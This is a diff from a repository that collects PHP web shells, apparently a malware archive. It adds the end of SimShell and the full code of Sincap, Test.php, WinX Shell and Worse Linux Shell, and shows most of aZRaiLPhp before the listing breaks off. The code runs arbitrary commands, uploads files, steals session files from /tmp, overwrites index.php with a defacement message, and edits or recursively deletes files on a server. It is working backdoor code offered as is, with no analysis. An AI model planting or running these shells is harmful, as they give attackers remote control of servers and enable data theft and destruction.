||||
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
||||
}
|
||||
|
||||
|
||||
while (strpos($new_dir, '/./') !== false)
|
||||
$new_dir = str_replace('/./', '/', $new_dir);
|
||||
|
||||
|
||||
while (strpos($new_dir, '//') !== false)
|
||||
$new_dir = str_replace('//', '/', $new_dir);
|
||||
|
||||
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
||||
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
||||
|
||||
if ($new_dir == '') $new_dir = '/';
|
||||
|
||||
|
||||
if (@chdir($new_dir)) {
|
||||
$_SESSION['cwd'] = $new_dir;
|
||||
} else {
|
||||
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
||||
}
|
||||
|
||||
} else {
|
||||
|
||||
chdir($_SESSION['cwd']);
|
||||
|
||||
$length = strcspn($_REQUEST['command'], " \t");
|
||||
$token = substr($_REQUEST['command'], 0, $length);
|
||||
if (isset($aliases[$token]))
|
||||
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
|
||||
|
||||
$p = proc_open($_REQUEST['command'],
|
||||
array(1 => array('pipe', 'w'),
|
||||
2 => array('pipe', 'w')),
|
||||
$io);
|
||||
|
||||
|
||||
while (!feof($io[1])) {
|
||||
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
||||
ENT_COMPAT, 'UTF-8');
|
||||
}
|
||||
|
||||
while (!feof($io[2])) {
|
||||
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
||||
ENT_COMPAT, 'UTF-8');
|
||||
}
|
||||
|
||||
fclose($io[1]);
|
||||
fclose($io[2]);
|
||||
proc_close($p);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if (empty($_SESSION['history'])) {
|
||||
$js_command_hist = '""';
|
||||
} else {
|
||||
$escaped = array_map('addslashes', $_SESSION['history']);
|
||||
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
||||
}
|
||||
|
||||
|
||||
header('Content-Type: text/html; charset=UTF-8');
|
||||
|
||||
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
|
||||
?>
|
||||
|
||||
<head>
|
||||
<title>SimShell - Simorgh Security MGZ</title>
|
||||
<link rel="stylesheet" href="Simshell.css" type="text/css" />
|
||||
|
||||
<script type="text/javascript" language="JavaScript">
|
||||
var current_line = 0;
|
||||
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
||||
var last = 0;
|
||||
|
||||
function key(e) {
|
||||
if (!e) var e = window.event;
|
||||
|
||||
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
||||
command_hist[current_line] = document.shell.command.value;
|
||||
current_line++;
|
||||
document.shell.command.value = command_hist[current_line];
|
||||
}
|
||||
|
||||
if (e.keyCode == 40 && current_line > 0) {
|
||||
command_hist[current_line] = document.shell.command.value;
|
||||
current_line--;
|
||||
document.shell.command.value = command_hist[current_line];
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function init() {
|
||||
document.shell.setAttribute("autocomplete", "off");
|
||||
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
||||
document.shell.command.focus();
|
||||
}
|
||||
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body onload="init()" style="color: #00FF00; background-color: #000000">
|
||||
|
||||
<span style="background-color: #000000">
|
||||
|
||||
|
||||
|
||||
</body>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
</span>
|
||||
|
||||
|
||||
|
||||
<p><span style="background-color: #000000"> Directory: </span> <code>
|
||||
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
|
||||
|
||||
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
|
||||
<div style="width: 900; height: 454">
|
||||
<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
|
||||
<?php
|
||||
$lines = substr_count($_SESSION['output'], "\n");
|
||||
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
|
||||
echo rtrim($padding . $_SESSION['output']);
|
||||
?>
|
||||
</textarea>
|
||||
<p class="prompt" align="justify">
|
||||
cmd:<input class="prompt" name="command" type="text"
|
||||
onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
|
||||
<input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows:
|
||||
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
|
||||
</p>
|
||||
<p class="prompt" align="center">
|
||||
<br>
|
||||
<br>
|
||||
<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
|
||||
Make On PhpShell Kernel<br>
|
||||
<a href="http://www.simorgh-ev.com" style="text-decoration: none">
|
||||
<font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
|
||||
</div>
|
||||
</form>
|
||||
|
||||
|
||||
</html>
|
124
xakep-shells/PHP/Sincap.php.php.txt
Normal file
124
xakep-shells/PHP/Sincap.php.php.txt
Normal file
|
@ -0,0 +1,124 @@
|
|||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv="Content-Language" content="tr">
|
||||
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
|
||||
<meta name="ProgId" content="FrontPage.Editor.Document">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) Böceði </title>
|
||||
</head>
|
||||
|
||||
<body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
|
||||
|
||||
<table border="0" width="100%" id="table1" cellspacing="0" cellpadding="0" height="108">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="83">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="83" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
Sincap 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="83" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
<br>
|
||||
</font><br>
|
||||
<font color="#858585" face="Verdana" style="font-size: 8pt">www.aventgrup.net <br>
|
||||
</font></span><a href="mailto:shopen@aventgrup.net">
|
||||
<font face="Verdana" style="font-size: 8pt; text-decoration: none" color="#C0C0C0">
|
||||
info@aventgrup.net</font></a><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1002" bgcolor="#484848" height="25" colspan="3">
|
||||
<font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">
|
||||
Linux Sessin ( Oturum ) Böceði</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#800000" width="100%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="8%" bgcolor="#B6B6B6">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000"> S.
|
||||
No</font></td>
|
||||
<td width="25%" bgcolor="#B6B6B6">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000"> Oturum
|
||||
Adý</font></td>
|
||||
<td width="42%" bgcolor="#B6B6B6">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000"> Oturum
|
||||
Deðeri</font></td>
|
||||
<td width="25%" bgcolor="#B6B6B6">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000"> Referans</font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
|
||||
|
||||
<?
|
||||
if ($sedat=@opendir("/tmp")){
|
||||
while (($ekinci=readdir ($sedat))){
|
||||
if (is_file("/tmp/$ekinci")){
|
||||
if($ekinci>"sess_"){
|
||||
$asortik=$ekinci;
|
||||
$baglan=fopen("/tmp/$ekinci",'r');
|
||||
while(! feof ( $baglan ) ){
|
||||
$okunan=fgets($baglan,1024);
|
||||
$toplam="$toplam$okunan";
|
||||
} fclose($baglan);
|
||||
};
|
||||
?>
|
||||
|
||||
|
||||
|
||||
<?
|
||||
}}}
|
||||
closedir($sedat);
|
||||
?>
|
||||
|
||||
<?
|
||||
$metin=$toplam;
|
||||
$i=explode(";",$metin);
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
||||
<?
|
||||
foreach($i as $yeni){
|
||||
$tampon=explode("|",$yeni);
|
||||
$deger1= "$tampon[0]";
|
||||
$ich=explode(":",$tampon[1]);
|
||||
$tampon3=count($ich);
|
||||
$tampon4=$tampon3-1;
|
||||
$deger2= "$ich[$tampon4]";
|
||||
$is++;
|
||||
$temizleme=array(
|
||||
'"'=>'',
|
||||
'v'=>'',
|
||||
'c'=>''
|
||||
);
|
||||
$degerT= strtr($deger2,$temizleme);
|
||||
?>
|
||||
<td width="8%" bgcolor="#E5E5E5" align="left" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#000000"> <?echo $is;?></font></td>
|
||||
<td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#000000"> <?echo $deger1;?></font></td>
|
||||
<td width="42%" bgcolor="#E5E5E5" align="left" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#000000"> <?echo $degerT;?></font></td>
|
||||
<td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#000000"> -</td>
|
||||
|
||||
</tr>
|
||||
<?};?>
|
||||
|
||||
</table>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
||||
|
||||
|
2246
xakep-shells/PHP/SnIpEr_SA Shell.php.txt
Normal file
2246
xakep-shells/PHP/SnIpEr_SA Shell.php.txt
Normal file
File diff suppressed because it is too large
Load diff
2822
xakep-shells/PHP/SpecialShell_99.php.php.txt
Normal file
2822
xakep-shells/PHP/SpecialShell_99.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
3309
xakep-shells/PHP/SsEs.php.php.txt
Normal file
3309
xakep-shells/PHP/SsEs.php.php.txt
Normal file
File diff suppressed because one or more lines are too long
13
xakep-shells/PHP/Test.php.php.txt
Normal file
13
xakep-shells/PHP/Test.php.php.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
<?php
|
||||
$entry_line="HACKed by EntriKa";
|
||||
$fp = fopen("index.php", "w");
|
||||
fputs($fp, $entry_line);
|
||||
fclose($fp);
|
||||
?>
|
||||
|
||||
<?
|
||||
$fp =@fopen("index.htm", "a+");
|
||||
$yazi = "test" . "\r\n";
|
||||
fwrite ($fp, "$yazi");
|
||||
fclose ($fp);
|
||||
?>
|
103
xakep-shells/PHP/WinX Shell.html.txt
Normal file
103
xakep-shells/PHP/WinX Shell.html.txt
Normal file
|
@ -0,0 +1,103 @@
|
|||
<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
|
||||
<body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
|
||||
<?php
|
||||
|
||||
// -----:[ Start infomation ]:-----
|
||||
// It's simple shell for all Win OS.
|
||||
// Created by greenwood from n57
|
||||
//
|
||||
// ------:[ End infomation]:-------
|
||||
|
||||
|
||||
set_magic_quotes_runtime(0);
|
||||
//*Variables*
|
||||
|
||||
//-------------------------------
|
||||
|
||||
$veros = `ver`;
|
||||
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
$windir = `echo %windir%`;
|
||||
|
||||
|
||||
//------------------------------
|
||||
if( $cmd == "" ) {
|
||||
$cmd = 'dir /OG /X';
|
||||
}
|
||||
//-------------------------------
|
||||
|
||||
|
||||
//------------------------------
|
||||
|
||||
print "<table style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\" border=\"0\" cellspacing=\"1\" cellpadding=\"2\" >";
|
||||
print "<tr>";
|
||||
print "<td><font color=\"#990000\">You:</font></td>" ;
|
||||
print "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
|
||||
print "</tr>";
|
||||
print "<tr>";
|
||||
print "<td><font color=\"red\">Version OS:</font></td>" ;
|
||||
print "<td><font color=\"#0066CC\"> $veros </font></td>";
|
||||
print "</tr>";
|
||||
print "<tr>";
|
||||
print "<td><font color=\"#990000\">Server:</font></td>";
|
||||
print "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
|
||||
print "</tr>";
|
||||
print "<tr>";
|
||||
print "<td><font color=\"#990000\">Win Dir:</font></td>";
|
||||
print "<td><font color=\"#0066CC\"> $windir </font></td>";
|
||||
print "</tr>";
|
||||
print "</table>";
|
||||
print "<br>";
|
||||
|
||||
//------- [netstat -an] and [ipconfig] and [tasklist] ------------
|
||||
print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
|
||||
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
|
||||
print " ";
|
||||
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
|
||||
print " ";
|
||||
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
|
||||
print "</form>";
|
||||
//-------------------------------
|
||||
|
||||
|
||||
//-------------------------------
|
||||
|
||||
print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
|
||||
system($cmd);
|
||||
print "</textarea>";
|
||||
print "<br>";
|
||||
|
||||
//-------------------------------
|
||||
|
||||
print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
|
||||
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
|
||||
print "<br>";
|
||||
print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
|
||||
print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
|
||||
print "</form>";
|
||||
|
||||
//-------------------------------
|
||||
|
||||
print "<form enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
|
||||
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
|
||||
print "<br>";
|
||||
print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
|
||||
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
|
||||
print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
|
||||
print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
|
||||
print"</form>";
|
||||
|
||||
?>
|
||||
|
||||
|
||||
<?
|
||||
|
||||
// Script for uploading
|
||||
if (is_uploaded_file($userfile)) {
|
||||
move_uploaded_file($userfile, $serverfile);
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
|
||||
<center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
|
||||
</body></html>
|
69
xakep-shells/PHP/Worse Linux Shell.php.txt
Normal file
69
xakep-shells/PHP/Worse Linux Shell.php.txt
Normal file
|
@ -0,0 +1,69 @@
|
|||
<?php
|
||||
|
||||
set_magic_quotes_runtime(0);
|
||||
|
||||
print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
|
||||
print "<center><h1>#worst @dal.net</h1></center>";
|
||||
print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
|
||||
print "<center><h1>Watch Your system Shany was here.</h1></center>";
|
||||
print "<center><h1>Linux Shells</h1></center>";
|
||||
print "<hr><hr>";
|
||||
|
||||
$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
|
||||
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
|
||||
|
||||
$UName = `uname -a`;
|
||||
$SCWD = `pwd`;
|
||||
$UserID = `id`;
|
||||
|
||||
if( $currentWD == "" ) {
|
||||
$currentWD = $SCWD;
|
||||
}
|
||||
|
||||
print "<table>";
|
||||
print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
|
||||
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
|
||||
print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
|
||||
print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
|
||||
print "</table>";
|
||||
|
||||
print "<hr><hr>";
|
||||
|
||||
if( $_POST['_act'] == "List files!" ) {
|
||||
$currentCMD = "ls -la";
|
||||
}
|
||||
|
||||
print "<form method=post enctype=\"multipart/form-data\"><table>";
|
||||
|
||||
print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
|
||||
print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
|
||||
|
||||
print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
|
||||
print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
|
||||
|
||||
print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
|
||||
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
|
||||
|
||||
print "</table></form><hr><hr>";
|
||||
|
||||
$currentCMD = str_replace("\\\"","\"",$currentCMD);
|
||||
$currentCMD = str_replace("\\\'","\'",$currentCMD);
|
||||
|
||||
if( $_POST['_act'] == "Upload!" ) {
|
||||
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
|
||||
print "<center><b>Error while uploading file!</b></center>";
|
||||
} else {
|
||||
print "<center><pre>";
|
||||
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
|
||||
print "</pre><b>File uploaded successfully!</b></center>";
|
||||
}
|
||||
} else {
|
||||
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
|
||||
$currentCMD = "cd ".$currentWD.";".$currentCMD;
|
||||
system($currentCMD);
|
||||
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
|
||||
}
|
||||
|
||||
exit;
|
||||
|
||||
?>
|
284
xakep-shells/PHP/aZRaiLPhp v1.0.php.txt
Normal file
284
xakep-shells/PHP/aZRaiLPhp v1.0.php.txt
Normal file
|
@ -0,0 +1,284 @@
|
|||
<?php
|
||||
$default=$DOCUMENT_ROOT;
|
||||
$this_file="./azrailphp.php";
|
||||
|
||||
if(isset($save)){
|
||||
$fname=str_replace(" ","_",$fname);
|
||||
$fname=str_replace("%20","_",$fname);
|
||||
header("Cache-control: private");
|
||||
header("Content-type: application/force-download");
|
||||
header("Content-Length: ".filesize($save));
|
||||
header("Content-Disposition: attachment; filename=$fname");
|
||||
|
||||
$fp = fopen($save, 'r');
|
||||
fpassthru($fp);
|
||||
fclose($fp);
|
||||
unset($save);
|
||||
exit;
|
||||
}
|
||||
|
||||
if ( function_exists('ini_get') ) {
|
||||
$onoff = ini_get('register_globals');
|
||||
} else {
|
||||
$onoff = get_cfg_var('register_globals');
|
||||
}
|
||||
if ($onoff != 1) {
|
||||
@extract($_POST, EXTR_SKIP);
|
||||
@extract($_GET, EXTR_SKIP);
|
||||
}
|
||||
|
||||
|
||||
function deltree($deldir) {
|
||||
$mydir=@dir($deldir);
|
||||
while($file=$mydir->read()) {
|
||||
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
|
||||
@chmod("$deldir/$file",0777);
|
||||
deltree("$deldir/$file");
|
||||
}
|
||||
if (is_file("$deldir/$file")) {
|
||||
@chmod("$deldir/$file",0777);
|
||||
@unlink("$deldir/$file");
|
||||
}
|
||||
}
|
||||
$mydir->close();
|
||||
@chmod("$deldir",0777);
|
||||
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SÝLÝNDÝ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
|
||||
}
|
||||
|
||||
if ($op=='phpinfo'){
|
||||
$fonk_kap = get_cfg_var("fonksiyonlarý_kapat");
|
||||
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalýþmýyiii</center>";
|
||||
exit;
|
||||
}
|
||||
|
||||
|
||||
echo "<html>
|
||||
<head>
|
||||
<title>azrail 1.0 by C-W-M</title>
|
||||
</head>
|
||||
|
||||
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
|
||||
</body>";
|
||||
|
||||
echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
|
||||
<center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
|
||||
<br>";
|
||||
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
|
||||
echo "<br>
|
||||
<br>";
|
||||
|
||||
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||
echo "<div align=center>
|
||||
<font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
|
||||
<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
|
||||
|
||||
if(!isset($dir)){
|
||||
$dir="$default";
|
||||
}
|
||||
echo "<input type=text size=60 name=dir value='$dir'>
|
||||
<input type=submit value='GIT'><br>
|
||||
</form>
|
||||
</div>";
|
||||
|
||||
if ($op=='up'){
|
||||
$path=dir;
|
||||
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
|
||||
if(isset($dosya_gonder)) {
|
||||
|
||||
if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
|
||||
echo "<center><font color='#0000FF'>Dosya Baþarýyla Gönderildi</font></center>";
|
||||
}
|
||||
} elseif(empty($dosya_gonder)) {
|
||||
$path=$dir;
|
||||
$dir = $dosya_dizin;
|
||||
echo "$dir";
|
||||
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
|
||||
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
|
||||
|
||||
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
|
||||
echo "</form>";
|
||||
|
||||
|
||||
echo "</html>";
|
||||
} else {
|
||||
die ("<center><font color='#FF0000'>Dosya kopyalanamýyor!</font><center>");
|
||||
}
|
||||
}
|
||||
|
||||
if($op=='mf'){
|
||||
$path=$dir;
|
||||
if(isset($dismi) && isset($kodlar)){
|
||||
$ydosya="$path/$dismi";
|
||||
if(file_exists("$path/$dismi")){
|
||||
$dos= "Böyle Bir Dosya Vardý Üzerine Yazýldý";
|
||||
} else {
|
||||
$dos = "Dosya Oluþturuldu";
|
||||
}
|
||||
touch ("$path/$dismi") or die("Dosya Oluþturulamýyor");
|
||||
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açýlamýyor");
|
||||
fwrite($ydosya2, $kodlar) or die("Dosyaya yazýlamýyor");
|
||||
fclose($ydosya2);
|
||||
echo "<center><font color='#0000FF'>$dos</font></center>";
|
||||
} else {
|
||||
|
||||
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
|
||||
echo "<center>Dosya Ýsmi :<input type='text' name='dismi'></center><br>";
|
||||
echo "<br>";
|
||||
echo "<center>KODLAR</center><br>";
|
||||
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
|
||||
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
|
||||
echo "</form>";
|
||||
}
|
||||
}
|
||||
|
||||
if($op=='md'){
|
||||
$path=$dir;
|
||||
if(isset($kismi) && isset($okmf)){
|
||||
$klasör="$path/$kismi";
|
||||
mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluþturulamýyor</font></center>");
|
||||
echo "<center><font color='#0000FF'>Klasör Oluþturuldu</font></center>";
|
||||
}
|
||||
|
||||
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
|
||||
echo "<center>Klasör Ýsmi :<input type='text' name='kismi'></center><br>";
|
||||
echo "<br>";
|
||||
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
|
||||
echo "</form>";
|
||||
}
|
||||
|
||||
|
||||
if($op=='del'){
|
||||
unlink("$fname");
|
||||
}
|
||||
|
||||
|
||||
if($op=='dd'){
|
||||
$dir=$here;
|
||||
$deldirs=$yol;
|
||||
if(!file_exists("$deldirs")) {
|
||||
echo "<font color=\"#ff0000\">Dosya Yok</font>";
|
||||
} else {
|
||||
deltree($deldirs);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
if($op=='edit'){
|
||||
$yol=$fname;
|
||||
$yold=$path;
|
||||
if (isset($ok)){
|
||||
$dosya = fopen("$yol", 'w') or die("Dosya Açýlamýyor");
|
||||
$metin=$tarea;
|
||||
fwrite($dosya, $metin) or die("Yazýlamýyor!");
|
||||
fclose($dosya);
|
||||
echo "<center><font color='#0000FF'Dosya Baþarýyla Düzenlendi</font></center>";
|
||||
} else {
|
||||
$path=$dir;
|
||||
echo "<center>DÜZENLE: $yol</center>";
|
||||
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açýlamýyor</font></center>");
|
||||
$boyut=filesize($yol);
|
||||
$duzen = @fread ($dosya, $boyut);
|
||||
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
|
||||
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
|
||||
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
|
||||
fclose($dosya);
|
||||
$duzen=htmlspecialchars($duzen);
|
||||
echo "</form>";
|
||||
}
|
||||
}
|
||||
|
||||
if($op=='efp2'){
|
||||
$fileperm=base_convert($_POST['fileperm'],8,10);
|
||||
echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 ÝSÝMLÝ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEÝÞTÝRÝLEMEDÝ!!</font>";
|
||||
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEÝÞTÝRÝLDÝ</font>";
|
||||
}
|
||||
|
||||
if($op=='efp'){
|
||||
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
|
||||
echo "<form method=post action=./$this_file?op=efp2>
|
||||
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
|
||||
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
|
||||
<input name='dir' type='hidden' value='$yol'>
|
||||
<input type='submit' value='TAMAM' class='input'></div><br>
|
||||
</form>";
|
||||
|
||||
}
|
||||
|
||||
|
||||
$path=$dir;
|
||||
if(isset($dir)){
|
||||
if ($dir = @opendir("$dir")) {
|
||||
while (($file = readdir($dir)) !== false) {
|
||||
if($file!="." && $file!=".."){
|
||||
if(is_file("$path/$file")){
|
||||
$disk_space=filesize("$path/$file");
|
||||
$kb=$disk_space/1024;
|
||||
$total_kb = number_format($kb, 2, '.', '');
|
||||
$total_kb2="Kb";
|
||||
|
||||
|
||||
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
|
||||
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
|
||||
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
|
||||
